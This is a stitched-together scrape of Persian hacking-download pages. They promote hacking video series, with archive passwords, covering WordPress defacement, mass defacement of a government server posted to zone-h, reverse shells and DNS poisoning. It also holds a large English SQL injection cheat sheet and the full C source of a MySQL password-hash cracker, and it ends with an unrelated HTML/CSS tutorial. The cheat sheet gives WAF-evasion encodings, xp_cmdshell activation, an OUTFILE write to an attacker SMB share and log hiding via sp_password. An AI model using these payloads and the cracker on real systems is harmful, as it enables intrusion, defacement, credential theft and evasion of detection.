برنامه
OWASP DirBuster
یکی از برنامه های بروت فورس برای پیدا کردن آدرس های مخفی سایت
!
این برنامه امکانات
زیادی داره از جمله :
قابلیت دادن لیست برای
بروت فورس کردن / بروت فورس کردن بصورت اتوماتیک (خودش آدرس ها رو میسازه) / بیرون
کشیدن فایل ها و فولدر های سایت / اضافه کردن پراکسی /ساپورت کردن
http & https و
….
یک ویدئوی بسیار کم نظیر و کاربردی برای علاقه مندان به بحث شبکه های وایرلس.
در این ویدئو یاد میگیرید که چگونه یک شبکه ی وایرلس رو
ddos
کنید طوری که هیچ کاربری نتونه ازش استفاده کنه و همه از شبکه قطع بشن. این
ویدئو رو از دست ندید.
دانلود
کاملترین آموزش شبکه و ویندوز سرور 2008 در اینترنت -55 گیگابایت با لینک
مستقیم.
ین مجموعه ی
آموزشی یکی از کمیاب ترین مجموعه های شبکه در اینترنت میباشد که توسط تیم
نویسندگان وطن دانلود جمع آوری شده است . این مجموعه شامل آموزش های قسمت های
مهم ویندوز 2008 سرور و اکتیودایرکتوری و Exchange
Server 2010
و آموزش شبکه در لینوکس میباشد که به صورت جداگانه برای دانلود قرار داده شده
است . این مجموعه محصول موسسه آموزشی TrainSignal
است.
این مجموعه
در هیچ فروشگاه و مارکت داخلی نیز به صورت کامل وجود ندارد و در مارکت های
خارجی بیش از 5 هزار دلار ارزش دارد .
این مجموعه
کامل شامل قسمت های زیر میباشد :
دانلود آموزش
اکتیو دایرکتوری - 3 دی وی دی دانلود آموزش
Windows Server 2008 MCITP Server Administrator -
شامل 2 دی وی
دی آموزش کامل
مدیریت شبکه های بیسیم - مدرک CWNA دانلود آموزش
Hyper V - ویندوز 2008 ( ساخت
ویندوز مجازی و VPS و
.. ) دانلود اموزش
Exchange Server 2010 - 2 DVD دانلود
رایگان آموزش مدرک تخصصی امنیت شبکه
:Train.Signal.CompTIA Security Plus - شامل 3 دی وی دی دانلود آموزش
کامل Application Infrastructure -شامل
2 دی وی دی دانلود
Enterprise Administrator دانلود آموزش
Network Infrastruture - 2 شامل 2 دی وی دی آموزش کامل
CampatiA Linux -شامل
3 دی وی دی
شاید کلمه لاتین VPSزیاد به گوشتان
خورده باشد. این کلمه، مخفف عبارت Virtual Private Serverاست که امروزه
برای مدیران سرورها کاربرد بسیاری دارد. سرور مجازی در واقع،
جزئی از یک سرور اختصاصی و مجزا است که هر کدام از این سرورهای مجازی می توانند به
صورت مستقل و مجزا، در شبکه محلی یا در بستر اینترنت، خدمات رسانی کنند. در سرورهای
مجازی، شما با تقسیم سخت افزار یک سرور قدرتمند و واقعی، به چندین قسمت و با نصب یک
سیستم عامل مجزا در هر کدام از قسمت ها، آن سرور قدرمتمند را به چندین سرور مجازی
مستقل تبدیل می نمائید. از معروفترین نرم افزارهایی که برای این امر، کاربرد بسیاری
دارد، نرم افزار VMwareمی باشد. به همین
دلیل در این پست، آموزش این نرم افزار را بصورت فیلم آموزشی برای کاربران عزیز
پاتوق یو مهیا نموده ایم.
دانلود
فايل حجم
فایل: 328.5
مگابایت
پسورد
فایل : www.patoghu.com
ین اموزش
تصویری تقریبا تمام اتصالات سخت افزاری شبکه رو به دوستان یاد میده!! قابل ذکر
است این آموزش به دوستان دانشجو و کسانی که دوست دارن شبکه یاد بگیرن خیلی کمک
میکنه!!!
مجموعهعظیم و
ارزشمند کلیپ های ویدئویی آموزش هک به زبان فارسی که توسطگروه هایمختلف
امنیتی ایران ساخته شده و حجم آنها حدود ۱۰
گیگابایت استرا باکیفیت
بالا می توانید در ۳۰۰
مگابایت برای اولین بار در مرجع تخصصیبرنامه
نویسی دانلود کنید.این مجموعه که توسط خودم جمع آوری شده شامل کلیپهای آموزش
مباحث زیر در هک و امنیت می باشد:
- چندین
کلیپ آموزش هک
ADSL و
روتر
- آموزش
دستورات
CMD
- آموزش
ساخت صفحه تقلبی
(Fake Page) واستفاده
از آن
- آموزش
کامل
SQL Inject
- آموزش
هک یاهو آیدی
- آموزش
هک وب سرور
- آموزش
netcat
- آموزش
هک
Cpanel
- آموزش
کامل اسکن کردن سایت با
acunetix
- آموزش
پیدا کردن آی پی کاربر در حالت های مختلف
- آموزش
کار با
netbios
- آموزش
کار با
Metasploit
- آموزش
هک کردن از طریق
Sql & Xss
- آموزش
دیفیس کردن صفحات asp
- آموزش
کامل کار با
KeyLogger همراه
با یک
KeyLogger حرفه ای
- آموزش
کار بانرم افزار
cain
- آموزش
کار با
Havij
- آموزش
پیدا کردن صفحه
Login یه
سایت
- آموزش
هک وردپرس
- آموزش
هک
VBulletin
- آموزش
هک کلاینت
(Client)
- آموزش
هک ویندوز سرورو ده ها
ویدئوی آموزشی دیگر…..حجم کل
این مجموعه حدود ۱۰
گیگابایت بود که بافرمت
EXE فشرده
کردم و به طور عجیبی به ۳۰۰
مگابایت رسید!پسورد
فایل:
www.ehsanavr.com
تصمیم دارم مجموعه فیلم های آموزش کامل هک که به زبان فارسی و همراه با صدا است را
برای دانلود در سایت قرار دهم.این مجموعه شامل ۲۱
قطعه ویدئو (با
کیفیت عالی) با حجم حدود ۱۵۰۰
مگابایت که در این پست قسمت اول و دوم و سوم آن را برای دانلود قرار داده ام.این
مجموعه برای اولین بار است که برای دانلود قرار داده می شود و فروشی است.پیشنهاد می
کنم کسانی که به سی دی های آن دسترسی دارند،جهت حمایت از تولید کنندگان،آن را به
صورت اورجینال تهیه کنند.
تمامی کلیپ ها فارسی،همراه با صدا و با کیفیت عالی می باشد.در
پایان از دوست خوبم امین رستمی که زحمت آپلود این مجموعه رو کشیدند،تشکر می کنم.
پسورد فایل:
www.ehsanavr.com
۵
مجموعه فیلم های آموزش هک رو برای دانلود قرار دادم. تمامی کلیپ ها فارسی،همراه با
صدا و با کیفیت عالی می باشد. در پایان از دوست خوبم امین رستمی که زحمت آپلود این
مجموعه رو کشیدند،تشکر می کنم. پسورد فایل:
www.ehsanavr.com
قسمت ۶
و ۷
مجموعه فیلم های آموزش هک به زبان فارسی را می توانید در این پست دانلود کنید.
تمامی کلیپ ها فارسی،همراه با صدا و با کیفیت عالی می باشد.در
پایان از دوست خوبم امین رستمی که زحمت آپلود این مجموعه رو کشیدند،تشکر می کنم.
پسورد فایل:
www.ehsanavr.com
سمت
هشتم و نهم مجموعه فیلم آموزشی هک به زبان فارسی را می توانید در ادامه این پست
دانلود کنید.
تمامی کلیپ ها فارسی،همراه با صدا و با کیفیت عالی می باشد.در
پایان از دوست خوبم امین رستمی که زحمت آپلود این مجموعه رو کشیدند،تشکر می کنم.
پسورد فایل:
www.ehsanavr.com
قسمت دهم مجموعه فیلم آموزشی هک به زبان فارسی را می توانید در ادامه این پست
دانلود کنید.
تمامی کلیپ ها فارسی،همراه با صدا و با کیفیت عالی می باشد.
پسورد فایل:
www.ehsanavr.com
قسمت ۱۱ تا
۱۷مجموعه
فیلم آموزشی هک به زبان فارسی را می توانید در ادامه این پست دانلود کنید. تمامی کلیپ ها فارسی،همراه با صدا
و با کیفیت عالی می باشد. پسورد فایل: www.ehsanavr.com
فیلم آموزش هک به زبان فارسی-قسمت ۱۱
(۱۲۵MB)
فیلم
آموزش هک به زبان فارسی-قسمت ۱۱ (۱۲۵MB)
فیلم
آموزش هک به زبان فارسی-قسمت ۱۲ (۸۹MB)
فیلم
آموزش هک به زبان فارسی-قسمت ۱۳ (۵۱MB)
فیلم
آموزش هک به زبان فارسی-قسمت ۱۴ (۸۹MB)
فیلم
آموزش هک به زبان فارسی-قسمت ۱۵ (۷۱MB)
فیلم
آموزش هک به زبان فارسی-قسمت ۱۶ (۸۸MB)
(تعداد
دفعات دانلود : 6401)
فیلم
آموزش هک به زبان فارسی-قسمت ۱۷ (۶۵MB)
قسمت ۱۸
تا آخر یعنی قسمت
۱۸
مجموعه فیلم آموزشی هک به زبان فارسی را می توانید در ادامه این پست دانلود کنید.
تمامی کلیپ ها فارسی،همراه با صدا و با کیفیت عالی می باشد. پسورد فایل:
www.ehsanavr.com
شاید برای شما هم پیش
آمده باشه که در برنامه نویسی دستوری رو فراموش و یا حضور ذهن ندارید .این مجموعه
شامل تمام دستورات زبانهای برنامه نویسی تحت وب می باشد که ما آنها را در چند نسخه
فایل پی دی اف گرده هم آورده ایم این دستورات شامل: HTML-
CSS - CSS2 -CSS3 - ASP - Action Script -HTML5 - XHTML - javascript -jQuery
-MySql - PHP -SEO
این فایل شامل 20 کتاب با
موضوع زبان های برنامه نویسی و تحت وب مختلف می باشد.
در این کتاب ها می خوانید:
دستورات
HTML 5
دستورات
CS3
دستورات
JQuery
دستورات
javascript
دستورات
PHP
و...
.
http://download.netqurd.com/Ebook/Programming/Heavy Programm Accelerate
[www.netqurd.com].rar
در این
فیلم با نحوه بایپس کردن (Page : The
page you have requested could not be found. (404 در
Admin Page جوملا آشنا
خواهید شد، هکر از طریق دو پلاگین،
jsecure و
jhackguard این کار را
انجام می دهد .
در این فیلم با نحوه فول دیفیس کردن یک سایت که از سیستم وردپرس
استفاده می کند آشنا خواهید شد، هکر از طریق خواندن فایل کانفیگ، به دیتابیس سایت
وصل می شود و پسورد ادمین را عوض می کند و ... در نهایت هدف را فول دیفیس می کند
.
در این فیلم با نحوه بروت فورس کردن وردپرس از طریق اسکنر
acunetix آشنا خواهید شد، این نوع حملات یکی از بهترین
روش ها برای کرک کردن پسورد ها می باشند که در خیلی از سایت ها دیده شده
است. در این فیلم هکر ابتدا سایت هدف را با اسکنر acunetix،
اسکن و بعد آسیب پذیری را مشخص می کند، و در ادامه یوزرنیم و پسورد، ادمین را پیدا
می کند.
در این فیلم شما با حملات
UnFiltered Header Injection آشنا خواهید شد، این نوع
حملات ساده و ترکیبی میباشند که در خیلی از سایت ها دیده شده است. در این فیلم هکر ابتدا سایت هدف را با اسکنر
acunetix پویش و آسیب پذیری را مشخص میکند، و در ادامه
کد مورد نظر را تزریق میکند.
در این فیلم هکر با استفاده از ابزار
Websploit که توسط سازنده فیلم نشسته شده است، هکر با دو
روش MFOD و
Java Apllet به سیستم قربانی نفوذ میکند، و در انتها از
سیستم مورد نفوذ قرار گرفته شل میگیرد.
این فیلم هک کامل یک سرور لینوکس را از مرحله اول تا به ثبت
رسانی در سایت zone-h به شما
آموزش میدهد. هکر ابتدا از سرور هدف که یک سرور دولتی میباشد دسترسی ایجاد کرده و
یوزر خود را به Root ارتقاء
میدهد، در ادامه لیستی از سایت هایی که روی سرور قرار دارند تهیه کرده و اقدام به
Mass Deface میکند و در انتها با استفاده از یک اسکریپت
تمام سایت ها را در سایت زون اچ ثبت میکند، فیلم خوبی تهیه شده و جواب خیلی از
متدهای متداول سرور هکینگ را در این فیلم خواهید یافت.
در این فیلم هکر از یک سرور ویندوزی که نفوذ کرده و دسترسی دارد
شل معکوس خواهد گرفت، روال مثل سرورهای لینوکسی میباشد، ابتدا
NC را در سیستم خود فال گوش گذاشته و از پورت مورد نظر
شل معکوس را میفرستد، این فیلم توسط دوست عزیزم izo ساخته شده که یکی از هکرهای خوب ترکیه میباشد. جرئیات را در
فیلم مشاهده کنید
در این فیلم هک کلاینت با برنامه
Armitage آموزش داده شده است، هکر با استفاده از این
برنامه ابتدا سیستم قربانی را اسکن کرده و پورت های باز را مشخص میکند که در این
فیلم پورت 445 میباشد، بعد از آنالیز کردن پورت 445 توسط برنامه، سیستم قربانی را
اکسپلویت کرده و از آن شل و دسترسی میگیرد و کارهایی از قبیل تست برای دیدن وبکم و
یا آپلود کردن فایل در سیستم قربانی، اتصال به Remote
Desktop و... که میتوانید از فیلم مشاهده کنید
در این فیلم هکر DSN را مسموم کرده و صفحه ای قلابی برای قربانی ها در شبکه ارسال
میکند، قربانی به هر صفحه ای مراجغه کند (در این فیلم گوگل) به
Ip هکر Redirect خواهد شد.
در ادامه که هکر با آسیب پذیری جاوا منتظر نشسته، قربانی به دام
او افتاده و payload هکر را اجرا
میکند
در این فیلم،شما با آموزش قدم به قدم هک، سایت بدون باگ آشنا
خواهید شد . گاهی وقت ها پیش می
آید که " Target " ما بدون باگ
باشه و ما مجبور شویم که سایت های دیگر سرور رو برسی کنیم . در این فیلم آموزشی،
هکر یک دورک را برای آسیب پذیری sql انتخاب کرده است و از طریق این دورک و پیدا کردن سایت آسیب پذیر
و ... تا فول دیفیس سایت بدون باگ و ثبت در zone-h پیش می رود .
UNION SELECT
GROUP_CONCAT(table_name) FROM
information_schema.tables WHERE version=10;
AND SELECT
SUBSTR(table_name,1,1) FROM
information_schema.tables > 'A'
AND(SELECT COUNT(*) FROM
(SELECT 1 UNION SELECT null UNION SELECT !1)x
GROUP BY CONCAT((SELECT table_name FROM
information_schema.tables LIMIT
1),FLOOR(RAND(0)*2)))
(@:=1)||@ GROUP BY
CONCAT((SELECT table_name FROM
information_schema.tables LIMIT 1),!@) HAVING
@||MIN(@:=0);
AND ExtractValue(1,
CONCAT(0x5c, (SELECT table_name FROM
information_schema.tables LIMIT 1)));--
Available in 5.1.5
UNION SELECT
GROUP_CONCAT(column_name) FROM
information_schema.columns WHERE table_name =
'tablename'
AND SELECT
SUBSTR(column_name,1,1) FROM
information_schema.columns > 'A'
AND(SELECT COUNT(*) FROM
(SELECT 1 UNION SELECT null UNION SELECT !1)x
GROUP BY CONCAT((SELECT column_name FROM
information_schema.columns LIMIT
1),FLOOR(RAND(0)*2)))
(@:=1)||@ GROUP BY
CONCAT((SELECT column_name FROM
information_schema.columns LIMIT 1),!@) HAVING
@||MIN(@:=0);
AND ExtractValue(1,
CONCAT(0x5c, (SELECT column_name FROM
information_schema.columns LIMIT 1)));--
Available in MySQL 5.1.5
AND (1,2,3) = (SELECT * FROM
SOME_EXISTING_TABLE UNION SELECT 1,2,3 LIMIT
1)-- Fixed in MySQL 5.1
AND (SELECT * FROM (SELECT *
FROM SOME_EXISTING_TABLE JOIN
SOME_EXISTING_TABLE b) a)
AND (SELECT * FROM (SELECT *
FROM SOME_EXISTING_TABLE JOIN
SOME_EXISTING_TABLE b USING
(SOME_EXISTING_COLUMN)) a)
PROCEDURE ANALYSE()
Note:
It is necessary for the web app to display
the one of the selected columns in the SQL
query you are injecting to.
Example:
Given the query
SELECT username, permission FROM Users WHERE
id = 1;
1 PROCEDURE ANALYSE()
Get the first column's name
1 LIMIT 1,1 PROCEDURE
ANALYSE()
Get the second column's name
1 LIMIT 2,1 PROCEDURE
ANALYSE()
Get the third column's name
Retrieving
Multiple Tables/Columns at once
SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM
(information_schema.columns) WHERE (table_schema>=@) AND
(@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ]
>',table_name,' > ',column_name))))x
Example:
SELECT * FROM Users WHERE id = '-1' UNION SELECT 1, 2,
(SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM
(information_schema.columns) WHERE (table_schema>=@) AND
(@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ]
>',table_name,' > ',column_name))))x), 4--+';
SELECT MID(GROUP_CONCAT(0x3c62723e, 0x5461626c653a20,
table_name, 0x3c62723e, 0x436f6c756d6e3a20, column_name
ORDER BY (SELECT version FROM information_schema.tables)
SEPARATOR 0x3c62723e),1,1024) FROM
information_schema.columns
Example:
SELECT username FROM Users WHERE id = '-1' UNION SELECT
MID(GROUP_CONCAT(0x3c62723e, 0x5461626c653a20,
table_name, 0x3c62723e, 0x436f6c756d6e3a20, column_name
ORDER BY (SELECT version FROM information_schema.tables)
SEPARATOR 0x3c62723e),1,1024) FROM
information_schema.columns--+';
' OR 1=1 INTO OUTFILE
'\\\\attacker\\SMBshare\\output.txt
Stacked Queries
Stacked queries are possible with MySQL depending on which
driver is being used by the PHP application to communicate
with the database.
The PDO_MYSQL driver supports stacked queries.
The MySQLi (Improved Extension) driver also
supports stacked queries through the multi_query()
function.
Examples:
SELECT * FROM Users WHERE ID=1 AND 1=0;
INSERT INTO Users(username, password, priv) VALUES
('BobbyTables', 'kl20da$$','admin');
SELECT * FROM Users WHERE ID=1 AND 1=0;
SHOW COLUMNS FROM Users;
MySQL-specific code
MySQL allows you to specify the version number after the
exclamation mark. The syntax within the comment is only
executed if the version is greater or equal to the specified
version number.
Examples:
UNION SELECT /*!50000
5,null;%00*//*!40000 4,null-- ,*//*!30000
3,null-- x*/0,null--+
The first example returns the version; it uses a
UNION with 2 columns.
The second example demonstrates how this can be
useful for bypassing a WAF/IDS.
Fuzzing and Obfuscation
Allowed Intermediary
Characters
The following characters can be used as whitespaces.
09
Horizontal Tab
0A
New Line
0B
Vertical Tab
0C
New Page
0D
Carriage Return
A0
Non-breaking Space
20
Space
Example:
'%0A%09UNION%0CSELECT%A0NULL%20%23
Parentheses can also be used to avoid the use of spaces.
28
(
29
)
Example:
UNION(SELECT(column)FROM(table))
Allowed
Intermediary Characters after AND/OR
20
Space
2B
+
2D
-
7E
~
21
!
40
@
Example:
SELECT 1 FROM dual WHERE 1=1 AND-+-+-+-+~~((1))
Note:
dual
is a dummy table which can be used for testing.
Obfuscating with Comments
Comments can be used to break up the query to trick the
WAF/IDS and avoid detection. By using # or -- followed by a
newline, we can split the query into separate lines.
Example:
1'#
AND 0--
UNION# I am a comment!
SELECT@tmp:=table_name x FROM--
`information_schema`.tables LIMIT 1#
URL Encoded the injection would look like:
1'%23%0AAND 0--%0AUNION%23
I am a comment!%0ASELECT@tmp:=table_name x FROM--%0A`information_schema`.tables
LIMIT 1%23
Certain functions can also be obfuscated with comments and
whitespaces.
VERSION/**/%A0 (/*comment*/)
Encodings
Encoding your injection can sometimes be useful for WAF/IDS
evasion.
URL Encoding
SELECT %74able_%6eame FROM
information_schema.tables;
Double URL Encoding
SELECT %2574able_%256eame FROM
information_schema.tables;
Unicode Encoding
SELECT %u0074able_%u6eame FROM
information_schema.tables;
Invalid Hex Encoding (ASP)
SELECT %tab%le_%na%me FROM
information_schema.tables;
Avoiding Keywords
If an IDS/WAF has blocked certain keywords, there are other
ways of getting around it without using encodings.
This tool is a high-speed brute-force password cracker for
MySQL hashed passwords. It can break an 8-character password
containing any printable ASCII characters in a matter of
hours on an ordinary PC.
/* This program is public domain. Share and enjoy.
*
* Example:
* $ gcc -O2 -fomit-frame-pointer MySQLfast.c -o MySQLfast
* $ MySQLfast 6294b50f67eda209
* Hash: 6294b50f67eda209
* Trying length 3
* Trying length 4
* Found pass: barf
*
* The MySQL password hash function could be strengthened considerably
* by:
* - making two passes over the password
* - using a bitwise rotate instead of a left shift
* - causing more arithmetic overflows
*/
#include <stdio.h>
typedef unsigned long u32;
/* Allowable characters in password; 33-126 is printable ascii */
#define MIN_CHAR 33
#define MAX_CHAR 126
/* Maximum length of password */
#define MAX_LEN 12
#define MASK 0x7fffffffL
int crack0(int stop, u32 targ1, u32 targ2, int *pass_ary)
{
int i, c;
u32 d, e, sum, step, diff, div, xor1, xor2, state1, state2;
u32 newstate1, newstate2, newstate3;
u32 state1_ary[MAX_LEN-2], state2_ary[MAX_LEN-2];
u32 xor_ary[MAX_LEN-3], step_ary[MAX_LEN-3];
i = -1;
sum = 7;
state1_ary[0] = 1345345333L;
state2_ary[0] = 0x12345671L;
while (1) {
while (i < stop) {
i++;
pass_ary[i] = MIN_CHAR;
step_ary[i] = (state1_ary[i] & 0x3f) + sum;
xor_ary[i] = step_ary[i]*MIN_CHAR + (state1_ary[i] << 8);
sum += MIN_CHAR;
state1_ary[i+1] = state1_ary[i] ^ xor_ary[i];
state2_ary[i+1] = state2_ary[i]
+ ((state2_ary[i] << 8) ^ state1_ary[i+1]);
}
state1 = state1_ary[i+1];
state2 = state2_ary[i+1];
step = (state1 & 0x3f) + sum;
xor1 = step*MIN_CHAR + (state1 << 8);
xor2 = (state2 << 8) ^ state1;
for (c = MIN_CHAR; c <= MAX_CHAR; c++, xor1 += step) {
newstate2 = state2 + (xor1 ^ xor2);
newstate1 = state1 ^ xor1;
newstate3 = (targ2 - newstate2) ^ (newstate2 << 8);
div = (newstate1 & 0x3f) + sum + c;
diff = ((newstate3 ^ newstate1) - (newstate1 << 8)) & MASK;
if (diff % div != 0) continue;
d = diff / div;
if (d < MIN_CHAR || d > MAX_CHAR) continue;
div = (newstate3 & 0x3f) + sum + c + d;
diff = ((targ1 ^ newstate3) - (newstate3 << 8)) & MASK;
if (diff % div != 0) continue;
e = diff / div;
if (e < MIN_CHAR || e > MAX_CHAR) continue;
pass_ary[i+1] = c;
pass_ary[i+2] = d;
pass_ary[i+3] = e;
return 1;
}
while (i >= 0 && pass_ary[i] >= MAX_CHAR) {
sum -= MAX_CHAR;
i--;
}
if (i < 0) break;
pass_ary[i]++;
xor_ary[i] += step_ary[i];
sum++;
state1_ary[i+1] = state1_ary[i] ^ xor_ary[i];
state2_ary[i+1] = state2_ary[i]
+ ((state2_ary[i] << 8) ^ state1_ary[i+1]);
}
return 0;
}
void crack(char *hash)
{
int i, len;
u32 targ1, targ2, targ3;
int pass[MAX_LEN];
if ( sscanf(hash, "%8lx%lx", &targ1, &targ2) != 2 ) {
printf("Invalid password hash: %s\n", hash);
return;
}
printf("Hash: %08lx%08lx\n", targ1, targ2);
targ3 = targ2 - targ1;
targ3 = targ2 - ((targ3 << 8) ^ targ1);
targ3 = targ2 - ((targ3 << 8) ^ targ1);
targ3 = targ2 - ((targ3 << 8) ^ targ1);
for (len = 3; len <= MAX_LEN; len++) {
printf("Trying length %d\n", len);
if ( crack0(len-4, targ1, targ3, pass) ) {
printf("Found pass: ");
for (i = 0; i < len; i++)
putchar(pass[i]);
putchar('\n');
break;
}
}
if (len > MAX_LEN)
printf("Pass not found\n");
}
int main(int argc, char *argv[])
{
int i;
if (argc <= 1)
printf("usage: %s hash\n", argv[0]);
for (i = 1; i < argc; i++)
crack(argv[i]);
return 0;
}
MSSQL
Default Databases
pubs
Not available on MSSQL 2005
model
Available in all versions
msdb
Available in all versions
tempdb
Available in all versions
northwind
Available in all versions
information_schema
Availalble from MSSQL 2000 and higher
Comment Out Query
The following can be used to comment out the rest of the
query after your injection:
/*
C-style comment
--
SQL comment
;%00
Nullbyte
Example:
SELECT * FROM Users WHERE username = '' OR 1=1
--' AND password = '';
SELECT * FROM Users WHERE id = '' UNION SELECT 1, 2, 3/*';
Testing Version
@@VERSION
Example:
True if MSSQL version is 2008.
SELECT * FROM Users WHERE id = '1' AND
@@VERSION LIKE '%2008%';
Note:
Output will also contain the version of the Windows
Operating System.
UNION SELECT name FROM
master..syscolumns WHERE id = (SELECT id FROM
master..syscolumns WHERE name = 'tablename')
AND SELECT
SUBSTRING(column_name,1,1) FROM
information_schema.columns > 'A'
AND 1 = (SELECT TOP 1
column_name FROM information_schema.columns)
AND 1 = (SELECT TOP 1
column_name FROM information_schema.columns
WHERE column_name NOT IN(SELECT TOP 1
column_name FROM information_schema.columns))
Retrieving
Multiple Tables/Columns at once
The following 3 queries will create a temporary table/column
and insert all the user-defined tables into it. It will then
dump the table content and finish by deleting the table.
Create Temp Table/Column and Insert Data:
AND 1=0; BEGIN DECLARE @xy varchar(8000) SET @xy=':'
SELECT @xy=@xy+' '+name FROM sysobjects WHERE xtype='U'
AND name>@xy SELECT @xy AS xy INTO TMP_DB END;
Dump Content:
AND 1=(SELECT TOP 1 SUBSTRING(xy,1,353) FROM TMP_DB);
Delete Table:
AND 1=0; DROP TABLE TMP_DB;
An easier method is available starting with MSSQL 2005 and
higher. The XML function path() works as a concatenator,
allowing the retrieval of all tables with 1 query.
SELECT table_name %2b ', ' FROM
information_schema.tables FOR XML PATH('')
SQL Server 2005+
Note:
You can encode your query in hex to "obfuscate" your
attack.
' AND 1=0; DECLARE @S VARCHAR(4000) SET
@S=CAST(0x44524f50205441424c4520544d505f44423b AS
VARCHAR(4000)); EXEC (@S);--
Avoiding the use of
quotations
SELECT * FROM Users WHERE username =
CHAR(97) + CHAR(100) + CHAR(109) + CHAR(105) + CHAR(110)
String Concatenation
SELECT CONCAT('a','a','a'); (SQL SERVER
2012)
SELECT 'a'+'d'+'mi'+'n';
Conditional Statements
IF
CASE
Example:
IF 1=1 SELECT 'true'
ELSE SELECT 'false';
SELECT CASE WHEN 1=1
THEN true ELSE false
END;
Note:
IF cannot be used inside a SELECT statement.
Timing
WAITFOR DELAY 'time_to_pass';
WAITFOR TIME 'time_to_execute';
Example:
IF 1=1 WAITFOR DELAY '0:0:5'
ELSE WAITFOR DELAY '0:0:0';
OPENROWSET Attacks
SELECT * FROM OPENROWSET('SQLOLEDB',
'127.0.0.1';'sa';'p4ssw0rd', 'SET FMTONLY OFF execute
master..xp_cmdshell "dir"');
System Command Execution
Include an extended stored procedure named xp_cmdshell that
can be used to execute operating system commands.
EXEC master.dbo.xp_cmdshell 'cmd';
Starting with version MSSQL 2005 and higher, xp_cmdshell is
disabled by default, but can be activated with the following
queries:
EXEC sp_configure 'show advanced
options', 1
EXEC sp_configure reconfigure
EXEC sp_configure 'xp_cmdshell', 1
EXEC sp_configure reconfigure
Alternatively, you can create your own procedure to achieve
the same results:
If the SQL version is higher than 2000, you will have to run
additional queries in order the execute the previous
command:
EXEC sp_configure 'show advanced
options', 1
EXEC sp_configure reconfigure
EXEC sp_configure 'OLE Automation
Procedures', 1
EXEC sp_configure reconfigure
Example:
Checks to see if xp_cmdshell is loaded, if it is, it
checks if it is active and then proceeds to run the
'dir' command and inserts the results into TMP_DB:
' IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_NAME='TMP_DB') DROP TABLE TMP_DB DECLARE @a
varchar(8000) IF EXISTS(SELECT * FROM dbo.sysobjects
WHERE id = object_id (N'[dbo].[xp_cmdshell]') AND
OBJECTPROPERTY (id, N'IsExtendedProc') = 1) BEGIN CREATE
TABLE %23xp_cmdshell (name nvarchar(11), min int, max
int, config_value int, run_value int) INSERT
%23xp_cmdshell EXEC master..sp_configure 'xp_cmdshell'
IF EXISTS (SELECT * FROM %23xp_cmdshell WHERE
config_value=1)BEGIN CREATE TABLE %23Data (dir
varchar(8000)) INSERT %23Data EXEC master..xp_cmdshell
'dir' SELECT @a='' SELECT
@a=Replace(@a%2B'<br></font><font
color="black">'%2Bdir,'<dir>','</font><font
color="orange">') FROM %23Data WHERE dir>@a DROP TABLE
%23Data END ELSE SELECT @a='xp_cmdshell not enabled'
DROP TABLE %23xp_cmdshell END ELSE SELECT
@a='xp_cmdshell not found' SELECT @a AS tbl INTO
TMP_DB--
Dump Content:
' UNION SELECT tbl FROM TMP_DB--
Delete Table:
' DROP TABLE TMP_DB--
SP_PASSWORD (Hiding Query)
Appending sp_password to the end of the query will hide it
from T-SQL logs as a security measure.
SP_PASSWORD
Example:
' AND 1=1--sp_password
Output:
-- 'sp_password' was found in the text of this event.
-- The text has been replaced with this comment for security reasons.
Stacked Queries
MSSQL supports stacked queries.
Example:
' AND 1=0 INSERT INTO ([column1], [column2]) VALUES
('value1', 'value2');
Fuzzing and Obfuscation
Allowed Intermediary
Characters
The following characters can be used as whitespaces.
01
Start of Heading
02
Start of Text
03
End of Text
04
End of Transmission
05
Enquiry
06
Acknowledge
07
Bell
08
Backspace
09
Horizontal Tab
0A
New Line
0B
Vertical Tab
0C
New Page
0D
Carriage Return
0E
Shift Out
0F
Shift In
10
Data Link Escape
11
Device Control 1
12
Device Control 2
13
Device Control 3
14
Device Control 4
15
Negative Acknowledge
16
Synchronous Idle
17
End of Transmission Block
18
Cancel
19
End of Medium
1A
Substitute
1B
Escape
1C
File Separator
1D
Group Separator
1E
Record Separator
1F
Unit Separator
20
Space
25
%
Examples:
S%E%L%E%C%T%01column%02FROM%03table;
A%%ND 1=%%%%%%%%1;
Note:
The percentage signs in between keywords is only
possible on ASP(x) web applications.
The following characters can be also used to avoid the use
of spaces.
Passwords begin with 0x0100, the first for bytes following
the 0x are a constant; the next eight bytes are the hash
salt and the remaining 80 bytes are two hashes, the first 40
bytes are a case-sensitive hash of the password, while the
second 40 bytes are the uppercase version.
This Knowledge Base was put together and is maintained by
Roberto Salgado, Co-Founder of Websec. It is a compilation
of books, papers, cheatsheets and testing done by Roberto
over the years.
Contact
Please feel free to send any suggestions you may have to
@LightOS or
e-mail.
html
پایه و اساس هر صفحه اینترنتی است که از سه بخش کلی و اصلی <html>
و <head>
و <body>
تشکیل شده است.
در این روش شما صفحه ای را در دست دارید که با نوشتن کدهای جدید و یا کاهش و افزایش
کدهای پیشین میتوانید به قالب مورد نظرتان دست یابید.
xhtml
چیست؟
xhtml
نوع دیگر نوشتن کدهای یک صفحه اینترنتی ست با این تفاوت که برای نمایش خود به
دستوراتی نیاز دارد که در قسمت
head
جای گرفته اند و یا در قالب یک فایل جداگانه با پسوند css
انجام وظیفه میکنند. مثلا وقتی میخواهید برای قسمت پست یک وبلاگ نوع فونت، رنگ و
سایز آن را تعیین کنید باید این دستور را در قسمت <style>
در بخش <head>
و یا در فایل css
مربوط به آن صفحه اعمال کنید و لازم نیست مانند html
قبل از هر متن از تگ (کد) <font>
استفاده کنید.
توجه: استفاده از دستورات
style
به طور دلخواه طراح میتواند در یک فایل
css.
و یا در همان صفحه مورد نظر در قسمت
head
و به صورت کد <style>
صورت بگیرد. در هر دو روش نتیجه یکسان خواهد بود.
css
چیست؟
دستورات (style
sheet)
ی که نحوه نمایش یک صفحه XHTML
را مشخص می کنند CSS
نامیده میشوند و در صورتی که بخواهند در یک فایل جداگانه ایفای نقش کنند در فایلی
با پسوند
css.
جای میگیرند. به عبارت دیگر: xhtml
ساختار اصلی صفحات وب را تعیین می کند و css
شکل ظاهری آن را.
بعد از هر جستجوی css
در میان صفحات فارسی به وبگاههایی خواهیم رسید که css
را از نظر لغوی معنی کرده اند با این حال برای کامل بودن این سری آموزشی به تکرار
مکررات هم میپردازم.
یکی از اصلی ترین و مهمترین ویژگی های xhtml
مطابقت آن با استانداردهای جهانی دسترسی سایت میباشد و به خاطر رعایت این
